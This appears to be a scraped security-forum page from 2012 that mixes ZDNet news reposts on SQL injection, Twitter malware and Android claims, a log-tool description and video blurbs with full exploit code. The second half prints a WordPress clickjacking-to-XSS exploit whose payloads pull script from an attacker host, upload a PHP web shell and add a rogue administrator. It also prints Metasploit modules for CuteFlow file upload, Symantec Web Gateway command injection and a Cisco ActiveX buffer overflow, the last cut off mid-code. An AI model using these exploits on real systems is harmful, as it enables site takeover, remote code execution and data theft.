Wubi

SQL injection attacks up 69% | ZDNet Summary: The number of SQL injection attacks has jumped by more than two thirds: from 277,770 in Q1 2012 to 469,983 in Q2 2012. This may be what hackers are using to steal all those e-mail addresses and passwords as of late. By Emil Protalinski for Zero Day | July 27, 2012 -- 20:20 GMT (13:20 PDT) SQL injection attacks are becoming significantly more popular amongst hackers, according to recent data. Between Q1 2012 and Q2 2012, there has been an estimated 69 percent increase of this attack type. The latest numbers come from secure cloud hosting company FireHost, which blocks various types of attacks that are attempting to harm its clients' Web applications and databases hosted at the firm's U.S. and European data centres. The company has broken down its findings into four different attack types which it considers as being the most malicious and dangerous: Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF). Here's where the 69 percent number for SQL injection attacks comes in: Firehost has seen a rise from 277,770 blocked attacks in the first quarter to 469,983 in the second quarter. The company also note this attack type is frequently cited as an attack vector of choice for data thieves. For the uninitiated, SQL injection involves the entering of malicious commands into URLs and text fields on vulnerable websites. The goal is to steal the contents of databases and then use that information for further crime. SQL injection attacks have been associated with many high profile data breaches, such as when LulzSec hacked Sony in 2011. The data is from this year, however, so what gives? Well, the method is also often used by hackers to steal user account credentials such as e-mail addresses and passwords. In the last few months, there have been a slew of attacks against the following sites: LinkedIn, eHarmony, Last.fm, Yahoo, Android Forums, Billabong, Formspring, Nvidia, and Gamigo, among others. I doubt they were all SQL injection attacks, but I wouldn't be surprised if many were. "Many, many sites have lost customer data in this way," Chris Hinkley, a Senior Security Engineer at FireHost, said in a statement. "SQL injection attacks are often automated and many website owners may be blissfully unaware that their data could actively be at risk. These attacks can be detected and businesses should be taking basic and blanket steps to block attempted SQL Injection, as well as the other types of attacks we frequently see." Sursa: SQL injection attacks up 69% | ZDNet

Twitter malware warning: It's you on photo? or It's about you? | ZDNet Summary: A new piece of malware is spreading on Twitter by getting users to click on a link that allegedly features a photo of them. There is no such photo on the other end. By Emil Protalinski for Zero Day | July 27, 2012 -- 17:09 GMT (10:09 PDT) Security researchers have discovered a new Twitter scam campaign that is spreading quickly across the social network by claiming to be a photo of the victim. Please be warned: there is no photo. There are, however, individuals very interested in putting the Blackhole exploit kit onto your computer (note: this is not the first time Twitter users are specifically being targeted, and it certainly won't be the last). The malware uses at least two different messages to spread. Twitter searches for "It's you on photo?" and "It's about you?" show that the scam is still circulating widely. As you can see in the screenshot above, the malicious tweets follow this pattern (please note that the cybercriminals can change the scam's wording as they please): I'm EmilProtalinski on Twitter. As such, if I was targeted by this scam, the message would look like this: Sophos, which first discovered this threat, detects the malware at the end of the link as "Troj/JSRedir-HY" and "Troj/Agent-XES." The security firm says the script redirects to an IP address which in turn redirects to a .cu.cc domain to load executable code, ultimately taking you to a .su domain that contains the Blackhole exploit kit. "Thousands of malicious links are being spammed out, targeting innocent users of the micro-blogging network," a Sophos spokesperson said in a statement. "There's a real danger that if Twitter users have not properly protected their PCs, and unless they are warned of the risk, that many people will click on the links without suspecting that they are putting their computer and personal data at risk." Webroot says that in addition to this English-based attack, a Russian spam campaign, which started on July 23, appears to be the origin of this attack. This makes sense given that many of the domains appear to be .ru (and the redirection seems to take place through traffichouse.ru). "The campaign is currently propagating in the following way – an automatically generated subdomain is spamvertised with an .html link consisting of the name of the prospective victim," a Webroot spokesperson said in a statement. "The cybercriminals behind the campaign are harvesting Twitter user names, then automatically generating the username.html files." As a general word of caution, don't click on random Twitter links that are directed at you. If you aren't sure why someone is sending you a link, ask them. Sursa: Twitter malware warning: It's you on photo? or It's about you? | ZDNet

BT: Almost every Android device is infected with malware | ZDNet Summary: British Telecom says that one third of Android apps are compromised with some form of active or dormant malware, and that almost every Android device is infected. Something doesn't add up here. By Emil Protalinski for Zero Day | July 27, 2012 -- 18:09 GMT (11:09 PDT) British Telecom (BT) has made some rather eyebrow-raising statements about Google's mobile operating system. We all know Android malware is a problem, but a BT security expert speaking at the NetEvents Americas conference has just made it sound like an epidemic that is affecting everyone. "We analyzed more than 1,000 Android applications and found a third compromised with some form of active or dormant malware," Jill Knesek, head of the global security practice at BT, said according to EE Times. "Almost every device is compromised with some kind of malware, although often it's not clear if that code is active or what it is doing." I've been covering the Android malware issue for quite some time, and while there is definitely more and more of it in the wild (last month was particularly bad), there is no way BT's claims are on target. I'm not sure which 1,000 Android apps BT chose to use in its analysis, but I doubt they were randomly picked. I find it very hard to believe that one third of Android apps contain malware and that almost every device has one of said apps installed. This made me wonder why BT would be making such statements. I know that the U.K. telecom service provider sued Google over Android as well as other products late last year, but that's not enough of a reason for BT to hate on Android. This seems to me like some kind of miscommunication, a quote that has been taken out of context, or simply a poorly informed BT employee. I have contacted BT about these claims. I'll update you if and when I hear back. Sursa: BT: Almost every Android device is infected with malware | ZDNet

Enterprise log searching and archiving always has been a difficult task for open source applications. ELSA plans on changing that. There are a number of free, open-source solutions out there which will provide a means for log collection, searching, and alerting, but they are not designed to scale to collecting all events from a large organization, while still making that data full-text searchable with millisecond response times. Commercial solutions do exist, which cost a LOT. Introducing ELSA! So, ELSA is inspired by Slunk and provides a centralized syslog framework on Syslog-NG, MySQL, and Sphinx full-text search. To be precise, ELSA is a three-tier log receiver, archiver, indexer, and web frontend for incoming syslog. It provides a fully asynchronous web-based query interface that normalizes logs and makes searching billions of them for arbitrary strings as easy as searching the web. It also includes tools for assigning permissions for viewing the logs as well as email based alerts, scheduled queries, and graphing. ELSA was born because commercial tools were both lacking, cost prohibitive and perhaps slow to receive the log volume on the hardware available with a tight budget. It is focused on speed versus dashboards and presentation. ELSA is a solution to achieve the following: Normalize, store, and index logs at unlimited volumes and rates Provide a simple and clean search interface and API Provide an infrastructure for alerting, reporting and sharing logs Control user actions with local or LDAP/AD-based permissions Plugin system for taking actions with logs Exist as a completely free and open-source project ELSA accomplishes these goals by harnessing the highly-specialized strengths of other open-source projects: Perl provides the glue to asynchronously tie the log receiver (Syslog-NG) together with storage (MySQL) and indexing (Sphinx Search) and serves this over a web interface provided either by Apache or any other web server, including a standalone pure-Perl server for a lighter footprint. Features offered by ELSA: High-volume receiving/indexing (a single node can receive > 30k logs/sec, sustained) Full Active Directory/LDAP integration for authentication, authorization, email settings Instant ad-hoc reports/graphs on arbitrary queries even on enormous data sets Email alerting, scheduled reports Plugin architecture for web interface Distributed architecture for clusters Ships with normalization for some Cisco logs, Snort/Suricata, Bro, and Windows via Eventlog-to-Syslog or Snare ELSA ships with several plugins such as Windows logs from Eventlog-to-Syslog, Snort/Suricata logs, Bro logs, Url logs from httpry_logger. These plugins tell the web server what to do when a user clicks the “Info” link next to each log. It can do anything, but it is designed for returning useful information in a dialog panel in ELSA with an actions menu. New plugins can be added easily by subclassing the “Info” Perl class and editing the elsa_web.conf file to include them. Contributions are welcomed by the author! ELSA has been found working with Ubuntu, openSUSE, CentOS, and FreeBSD operating systems, untested on *BSD, Syslog-NG 3.1, MySQL 5.1, Sphinx search, Apache, and Perl. It is a complex system and will require a fair amount of initial configuration, but once it is up and running, it will not need much maintenance or tuning. If you run into issues, let the author know and he will try to help you get up and running. ELSA is available under GPLv2 licensing. Download ELSA: elsa.tar.gz Sursa: PenTestIT — Your source for Information Security Related information!

Description: This and more videos in: Blog de Omar You can download the software Stake LC5 and the rainbow tables in: Blog de Omar and El Palomo | Facebook Follow me: @ELPalomo_Blog The video shows the following procedures: How to Windows saves the passwords: LM hash / NTLM Hash How to get the password via PWDUMP How to work the Rainbow Tables Cracking the password with Stake LC5 via Rainbow Tables Versión en español: Cracking Password Windows Con Rainbow Tables - Español Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. Visit: [in]Seguridad Informática Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: Video demonstration in which the tool is used to audit ProxyStrike a site and exploits vulnerabilities with SQLmap. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Wordpress =< 3.1.2 Clickjacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode Exploit Title: Wordpress =< 3.1.2 Clickjacking Exploit 0day Author: Caddy-Dz Facebook Page: Algerian CA | Facebook Home : ?????? ?????? ?????? E-mail: islam_babia@hotmail.com Category:: webapps Google Dork: "powered by wordpress" Security Risk: critical Tested on: Windows Seven Edition Integral / French 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Caddy-dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #### # Exploit Title: Wordpress =< 3.1.2 Clickjacking Exploit 0day # Author: Caddy-Dz # Facebook Page: www.facebook.com/Algerian.Cyber.Army # Home : http://quran4you.eb2a.com # E-mail: islam_babia@hotmail.com # Category:: webapps # Google Dork: "powered by wordpress" # Security Risk: critical # Tested on: Windows Seven Edition Integral / French #### #PS: No Protection of clickjacking in WordPress 3.1.2 and earlier Exploit Process : 1- Lure WordPress admin to a webpage : A clickjacking page with an invisible Plugin Install webpage from their own WordPress admin console on top of a visible dummy page 2- Get them to click : They can’t see that they’re clicking an ?Install Now? button 3- Install Vulnerable Plugin : They have installed SlidePress, a vulnerable plugin 4- Detect Click Happened : Using onloaded="function()" 5- Exploit Vulnerable Plugin : Exploit Cross Site Scripting in SlidePress 6- Install Backdoor : Upload a shell as a plugin =) How does Plugin installation work? -A ZIP archive gets unpacked into http://victim.com/wp-content/plugins/ -Installed but not activated -The Install Now button is in an iframe pointing to the WordPress admin console -The Admin users browser automatically authenticates with session cookies. The Admin must be logged in. # CJ V1 Exploit : ================= <html> <head><title>Clickjack Exploit for WordPress v1</title></head> <body> <style> #outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:0; } #inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; } #para { width:650px; } </style> <h1>WordPress Clickjack Exploit v1</h1> <p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi. <a href="#">read more</a> </p> <div id="outerdiv"> <iframe id="inneriframe" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php? tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height= 581"> wordpress </iframe> </div> PS: How do I stop redirecting after installing the plugin? -An iframe within an iframe -The inner frame which loads the Plugin webpage is named _parent <iframe id="innerframe" class="innerframe" scrolling= "no" src="data:text/html;charset=utf-8, ---snip--- <iframe name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php... '> </iframe>"> </iframe> PS: How to leverage the power to install an arbitrary plugin? * Find a vulnerable plugin - For exemple SlidePress is vulnerable to Reflected Cross Site Scripting (XSS) -Vulnerable when installed but not activated so only one click is required. * Proof of concept exploit : ||>> http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1 &sspHeight=</script><script>alert(document.cookie)</script>&sspGalleryId=1 -Injects JavaScript into a webpage -Can add an admin user or upload a backdoor * How do I automatically start XSS after the Plugin installs? -I need to detect when the user clicks -Use the load method of the iframe -1st load is the page load, 2nd load is the stolen click ||>> function frameloaded() { load_count=load_count+1; if (load_count==2) { # exploit time ex(); } } ---snip--- <iframe class='attacksite' onload='frameloaded() Upon the 2nd frame load, ex() is called to perform the XSS attack -Stage2 is loaded with the SlidePress page which contains a XSS vulnerability -The XSS payload is stored at http://hax0r/x2.js ||>> function ex() { top.document.getElementById('stage2').src='http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=http://hax0r/x2.js?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=/&a=></if'+'rame>'; } ---snip---- <iframe id="stage2"></iframe> * exploit source code : ======================= #outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:135px; left:445px; z-index:10; opacity:0; } .stage2 { opacity:0; } #para { width:600px; } .clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; } </style> <h1>WordPress Clickjack Exploit v1</h1> <p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p> <div class='clickjack'><a href='#'>read more</a></div> <div id="outerdiv" > <iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8, — snip— "> </iframe> </div> <iframe class='stage2' style='height:0px;width:0px;' id='stage2'> </iframe> <iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8, <style> .inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }</style> <script> var load_count=0; function frameloaded() { load_count=load_count+1; if (load_count==2) { ex(); } } function ex() { top.document.getElementById('stage2').src='http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3'+'C/script%3E'+'%3'+'Cscript%20src=http://hax0r/x2.js?i='+Math.random()+'%3E%3'+'C/script%3E%3'+'Cnos'+'cript%3E&sspGalleryId=1&wp_path=/&a=></if'+'rame>'; } </script> <iframe id='inneriframe' class='inneriframe' onload='frameloaded();' name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=slidepress&TB_iframe=true&width=640&height=581'> </iframe> "></iframe> * How do I upload a backdoor with SlidePress’s Cross Site Scripting? * Use JavaScript to force the admin’s browser to: -Use SlidePress XSS to call a payload script on another website <script src=?http://hax0r/x2.js?> -Get the CSRF wpnonce token from the Update page using XMLHttpRequest() -Upload a Plugin using XMLHttpRequest.sendAsBinary which unpacks a backdoor to http://wordpress/wp-content/plugins/shell/shell.php [*] Payload to upload PHP Shell : ================================= // x2.js payload to upload PHP shell to wordpress. /wp-content/plugins/shell/shell.php?cmd=ls path_to_wp = "/"; xmlhttp = new XMLHttpRequest(); xmlhttp.open("GET",path_to_wp + "/wp-admin/plugin-install.php?tab=upload",true); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4) { response=xmlhttp.responseText; nonce=response.split('hidden" id="_wpnonce')[1]; nonce=nonce.split('"')[4]; xmlhttp.open("POST", path_to_wp + "/wp-admin/update.php?action=upload-plugin",true); xmlhttp.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------304661183327760"); // shell.zip contains shell.php which is <? passthru($_REQUEST['cmd']); ?> post_data="-----------------------------304661183327760\r\n"+ "Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n"+ nonce + "\r\n"+"-----------------------------304661183327760\r\n"+"Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n"+ path_to_wp + "/wp-admin/plugin-install.php?tab=upload\r\n"+ "-----------------------------304661183327760\r\n"+ "Content-Disposition: form-data; name=\"pluginzip\";\r\n"+ "filename=\"shell.zip\"\r\n"+"Content-Type: application/octet-stream\r\n\r\n"; post_data=post_data+"\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00…"; xmlhttp.setRequestHeader("Content-Length",post_data.length); xmlhttp.sendAsBinary(post_data); } } xmlhttp.send(null); [*] Payload to add admin : ========================== // payload to add administrator user path_to_wp = "/"; new_username="caddy-dz"; new_password="caddy-dz"; new_email="caddy-dz%40hotmail.fr"; // %40 for @ xmlhttp = new XMLHttpRequest(); xmlhttp.open("GET",path_to_wp + "/wp-admin/user-new.php",true); xmlhttp.onreadystatechange=function() { if (xmlhttp.readyState==4) { response=xmlhttp.responseText; nonce=response.split('hidden" id="_wpnonce')[1]; nonce=nonce.split('"')[4]; xmlhttp.open("POST", path_to_wp + "/wp-admin/user-new.php",true); xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); post_data="_wpnonce=" + nonce + "&action=adduser&user_login="+ new_username + "&first_name=&last_name=&email=" + new_email + "&url=&pass1=" + new_password + "&pass2=" + new_password + "&role=administrator&adduser=Add+User" xmlhttp.setRequestHeader("Content-Length",post_data.length); xmlhttp.send(post_data); } } xmlhttp.send(null); # Peace From Algeria ..// # Happy Ramadhan ..// # # Greets To : ==============================================================================# # The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates , # # TrOoN , jos_ali_joe , All Exploit-Id Team , (exploit-id.com) , (1337day.com) , # # ... And All Algerian Hax0rs # ============================================================================================# # 1337day.com [2012-07-27]

CuteFlow v2.11.2 Arbitrary File Upload Vulnerability [table=width: 500, class: grid] [tr] [td]EDB-ID: 20111[/td] [td]CVE: N/A [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-27[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "CuteFlow v2.11.2 Arbitrary File Upload Vulnerability", 'Description' => %q{ This module exploits a vulnerability in CuteFlow version 2.11.2 or prior. This application has an upload feature that allows an unauthenticated user to upload arbitrary files to the 'upload/___1/' directory and then execute it. }, 'License' => MSF_LICENSE, 'Author' => [ 'Brendan Coles <bcoles[at]gmail.com>' # Discovery and exploit ], 'References' => [ ['URL', 'http://itsecuritysolutions.org/2012-07-01-CuteFlow-2.11.2-multiple-security-vulnerabilities/'] #['OSVDB', ''], #['EDB', ''], ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "none" }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'Privileged' => false, 'DisclosureDate' => "Jul 27 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The path to the web application', '/cuteflow_v.2.11.2/']) ], self.class) end def check base = target_uri.path base << '/' if base[-1, 1] != '/' res = send_request_raw({ 'method' => 'GET', 'uri' => "#{base}" }) if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/ return Exploit::CheckCode::Vulnerable elsif res.body =~ /\<a href\=\"http\:\/\/cuteflow\.org" target\=\"\_blank\"\>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def upload(base, fname, file) # construct post data boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(10)}" data_post = "--#{boundary}\r\n" data_post << "Content-Disposition: form-data; name=\"attachment1\"; filename=\"#{fname}\"\r\n" data_post << "Content-Type: text/php\r\n" data_post << "\r\n" data_post << file data_post << "\r\n" data_post << "--#{boundary}\r\n" # upload res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}pages/restart_circulation_values_write.php", 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data_post, }) return res end def exploit base = target_uri.path base << '/' if base[-1, 1] != '/' @peer = "#{rhost}:#{rport}" # upload PHP payload to upload/___1/ print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length.to_s} bytes)") fname = rand_text_alphanumeric(rand(10)+6) + '.php' php = %Q|<?php #{payload.encoded} ?>| res = upload(base, fname, php) if res.nil? print_error("#{@peer} - Uploading PHP payload failed") return end # retrieve and execute PHP payload print_status("#{@peer} - Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', 'uri' => "#{base}upload/___1/#{fname}" }) handler end end

Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection [table=width: 500, class: grid] [tr] [td]EDB-ID: 20113[/td] [td]CVE: 2012-2953 [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-27[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection", 'Description' => %q{ This module exploits a command injection vulnerability found in Symantec Web Gateway's HTTP service. While handling the filename parameter, the Spywall API does not do any filtering before passing it to an exec() call in proxy_file(), thus results in remote code execution under the context of the web server. Please note authentication is NOT needed to gain access. }, 'License' => MSF_LICENSE, 'Author' => [ 'muts', # Original discovery 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2012-2953' ], [ 'BID', '54426' ], [ 'EDB', '20088' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00'] ], 'Payload' => { #'BadChars' => "\x00\x0d\x0a", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl bash telnet' } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Web Gateway 5.0.2.18', {}] ], 'Privileged' => false, 'DisclosureDate' => "Jul 23 2012", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to pbcontrol', '/spywall/pbcontrol.php']) ], self.class) end def check dir = File.dirname(target_uri.path) res1 = send_request_raw({'uri' => "#{dir}/login.php"}) res2 = send_request_raw({'uri' => "#{dir}/pbcontrol.php"}) if res1 and res2 if res1.body =~ /\<title\>Symantec Web Gateway\<\/title\>/ and res2.body =~ /^0$/ return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe end def exploit send_request_cgi({ 'uri' => target_uri.path, 'method' => 'GET', 'vars_get' => { 'filename' => "#{Rex::Text.rand_text_alpha(4)}\";#{payload.encoded};\"", 'stage' => '0' } }) handler end end

Cisco Linksys PlayerPT ActiveX Control Buffer Overflow [table=width: 500, class: grid] [tr] [td]EDB-ID: 20112[/td] [td]CVE: 2012-0284 [/td] [td]OSVDB-ID: 80297[/td] [/tr] [tr] [td]Author: metasploit[/td] [td]Published: 2012-07-27[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: N/A[/td] [td][/td] [/tr] [/table] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Seh include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "8.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :classid => "{9E065E4A-BD9D-4547-8F90-985DC62A5591}", :method => "SetSource", :rank => NormalRanking }) def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco Linksys PlayerPT ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability found in Cisco Linksys PlayerPT 1.0.0.15 as the installed with the web interface of Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera. The vulnerability, due to the insecure usage of sprintf in the SetSource method, allows to trigger a stack based buffer overflow which leads to code execution under the context of the user visiting a malicious web page. }, 'Author' => [ 'Carsten Eiram', # Vulnerability Discovery 'rgod', # PoC 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '80297' ], [ 'CVE', '2012-0284' ], [ 'BID', '54588' ], [ 'EDB', '18641' ], [ 'URL', 'http://secunia.com/secunia_research/2012-25/' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'BadChars' => "\x00\x0d\x0a\x5c", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # Cisco Linksys PlayerPT ActiveX Control 1.0.0.15 [ 'Automatic', { } ], [ 'IE 6 on Windows XP SP3', { 'Spray' => true, 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'OffsetStackBottom' => 8556 } ], [ 'IE 7 on Windows XP SP3 / Windows Vista SP2', { 'Spray' => true, 'SprayBlocks' => 0x185, 'SprayOffset' => '0x0', 'OffsetStackBottom' => 3220 } ], [ 'IE 8 on Windows XP SP3', { 'Spray' => false, 'OffsetRop' => 160, 'Offset' => 456, 'Ret' => 0x1002c536, # ADD ESP,0A2C # RETN from PlayerPT.ocx 'OffsetStackBottom' => 4108 } ] ], 'Privileged' => false, 'DisclosureDate' => 'Mar 22 2012', 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class ) end def get_spray(t, js_code, js_nops) spray = <<-JS var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{t['SprayOffset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var z=1; z < #{t['SprayBlocks']}; z++) { heap_obj.alloc(block); } JS return spray end # rop chain generated with mona.py def create_rop_chain() rop_gadgets = [ 0x77c2f271, # POP EBP # RETN [msvcrt.dll] 0x77c2f271, # skip 4 bytes [msvcrt.dll] 0x77c5335d, # POP EBX # RETN [msvcrt.dll] 0xffffffff, # 0x77c127e1, # INC EBX # RETN [msvcrt.dll] 0x77c127e1, # INC EBX # RETN [msvcrt.dll] 0x77c4e392, # POP EAX # RETN [msvcrt.dll] 0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77c34de1, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) 0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] 0x77c479e2, # POP EDI # RETN [msvcrt.dll] 0x77c39f92, # RETN (ROP NOP) [msvcrt.dll] 0x77c3b8ba, # POP ESI # RETN [msvcrt.dll] 0x77c2aacc, # JMP [EAX] [msvcrt.dll] 0x77c4e392, # POP EAX # RETN [msvcrt.dll] 0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] 0x77c12df9, # PUSHAD # RETN [msvcrt.dll] 0x77c51025, # ptr to 'push esp # ret ' [msvcrt.dll] ].pack("V*") return rop_gadgets end def get_payload(my_target) case my_target.name when /IE 6 on Windows XP SP3/ my_payload = "\x0c" * my_target['OffsetStackBottom'] return my_payload when /IE 7 on Windows XP SP3 \/ Windows Vista SP2/ my_payload = "\x0c" * my_target['OffsetStackBottom'] return my_payload when /IE 8 on Windows XP SP3/ my_payload = rand_text_alpha(my_target['OffsetRop']) my_payload << create_rop_chain my_payload << make_nops(my_target['Offset'] - my_payload.length) my_payload << generate_seh_record(my_target.ret) my_payload << payload.encoded my_payload << rand_text_alpha(my_target['OffsetStackBottom'] - my_payload.length) return my_payload end end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[3] #IE 8 on Windows XP SP3 elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows Vista SP2 else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] print_status("User-agent: #{agent}") my_target = get_target(agent) # Avoid the attack if the victim doesn't have a setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent}") send_not_found(cli) 